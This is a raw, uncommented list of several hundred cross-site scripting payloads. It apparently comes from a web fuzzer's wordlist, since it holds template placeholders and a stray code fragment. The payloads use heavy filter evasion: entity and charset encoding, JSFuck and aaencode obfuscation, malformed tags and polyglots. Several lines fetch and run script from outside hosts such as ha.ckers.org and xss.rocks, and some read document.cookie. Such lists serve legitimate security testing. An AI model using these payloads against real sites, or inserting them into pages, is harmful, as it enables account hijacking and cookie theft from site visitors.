<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC= onmouseover="alert('xxs')"
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<svg/onload=alert(1)>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
</script><svg onload=alert(1)>
“><img onerror=alert(1) src>
<img src='x' onerror='alert(1)'>
%00<script>alert(1)</script>
%00<script>alert(1);</script>
</Textarea/</Noscript/</Pre/</Xmp><Svg/Onload=confirm(document.domain)>”<script/src=//15.rs></script><script src=//⑮.₨></script> *
document.createElement('div').innerHTML = "<img src=1 onerror=alert()>
SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS')\"
&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
;alert(String.fromCharCode(88,83,83))// ></SCRIPT> > ><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG ><SCRIPT>alert( XSS )</SCRIPT> >
<IMG SRC= jav ascript:alert( XSS ); >
<IMG SRC= jav&#x09;ascript:alert( XSS ); >
<<SCRIPT>alert( XSS );//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
><s %2b cript>alert(document.cookie)</script>
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
<input type=image src onerror="prompt(1)">
<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>
&#00039-alert(1)-&#00039
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
<svg %09onload=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
';alert(document.domain)//
<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
<img/src=`%00` onerror=this.onerror=confirm(1)
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
'() {'document.createElement('img').src='javascript:while(1){}'
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>'
(function(a){alert(1)}).call()
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
p'rompt(1)
"(prompt(1))in"
parseInt("prompt",36);
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(1558153217..toString(36))(1)
eval(630038579..toString(30))(1)
eval(0x258da033.toString(30))(1)
for((i)in(self))eval(i)(1)
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}}
javascript:prompt(1)#{"action":1}
vbscript:prompt(1)#{"action":1}
window.location.assign("http://xss.cx")
window.name='a\x01b'
window.name='hacked';location.replace('about:blank');
window.name="javascript:confirm((window.opener||window).document.cookie);";
window.open("http://xss.cx","confirm(document.domain);", "", false);
vbscr&Tab;ipt:confirm(1)"
vbscript&#00058;confirm(1);
vbscript:confirm(1);
{{{}.toString.constructor('confirm(1)')()}}
confirm(1)".replace(/.+/,eval)//
confirm(1)>>>/xss
'+confirm(9)&&null=='
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";
confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--
\";confirm(document.location);//
confirm(document.location)
confirm(document.selection.createRange().getBookmark())
confirm(location.hostname)
confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>'));
confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click'));
confirm(window.toStaticHTML('<marquee>foo</marquee>'));
confirm(<xss>xs{[function::status]}s</xss>)
%c0″//(0000%0dconfirm(1)//
;\"))}catch(e) {confirm(document.location);}//
;\\"))}catch(e) {confirm(document.location);}//
\"));}catch(e){confirm(document.domain);}//
\"));}catch(e){confirm(document.domain)}//
\"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
";document.body.addEventListener("DOMActivate",confirm(1))//
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=confirm(1)>')
javaSCRIPT&colon;confirm(1)
javas&Tab;cript:\u0061lert(1);
javascript&#00058;confirm(1)
"javascript:confirm(0);",
;javascript:confirm(0);
;})javascript:confirm(0);
javascript:confirm(0);
javascript:confirm(1)//
javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x
"javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x"
/"/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;confirm&lpar;document&period;cookie&rpar;
;prompt(1)//”;prompt(2)//”;prompt(3)//></SCRIPT>”>><SCRIPT>prompt(4)</SCRIPT>
"!=prompt(9)!="
"*prompt(9)*"
"-prompt(9)-"
"/prompt(9)/"
"<<prompt(9)<<"
"<=prompt(9)<="
"<prompt(9)<"
"===prompt(9)==="
"==prompt(9)=="
">=prompt(9)>="
">>>prompt(9)>>>"
">>prompt(9)>>"
">prompt(9)>"
"?prompt(9):"
"^prompt(9)^"
"|prompt(9)|"
"||prompt(9)||"
prompt(9)
prompt(location.hash)
prototype.join=function(){confirm("PWND:"+document.body.innerHTML)}')();
j&NewLine;a&NewLine;vas&NewLine;cript:confirm(1);
parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></input>
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
<math xlink:href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</math>
<iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
<title>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
<svg onload="void 'javascript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e';"></svg>
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
